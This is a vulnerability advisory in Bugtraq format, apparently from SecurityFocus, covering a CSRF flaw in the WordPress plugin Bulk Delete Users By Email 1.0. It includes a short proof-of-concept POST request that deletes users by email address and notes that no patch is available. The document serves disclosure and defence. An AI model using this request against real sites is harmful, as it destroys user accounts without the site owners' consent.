BID:69712

WordPress Bulk Delete Users By Email Plugin Cross Site Request Forgery Vulnerability

Info

WordPress Bulk Delete Users By Email Plugin Cross Site Request Forgery Vulnerability

Bugtraq ID:	69712
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Sep 06 2014 12:00AM
Updated:	Sep 06 2014 12:00AM
Credit:	Fikri Fadzil
Vulnerable:	Speak Digital Ltd Bulk Delete Users By Email 1.0

Not Vulnerable:

Exploit / POC

WordPress Bulk Delete Users By Email Plugin Cross Site Request Forgery Vulnerability

To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.

The following example URI is available:

http://www.example.com/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete

Solution / Fix

WordPress Bulk Delete Users By Email Plugin Cross Site Request Forgery Vulnerability

Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

References

WordPress Bulk Delete Users By Email Plugin Cross Site Request Forgery Vulnerability

References:

WordPress Bulk Delete Users by Email Homepage (Speak Digital Ltd)
WordPress HomePage (WordPress)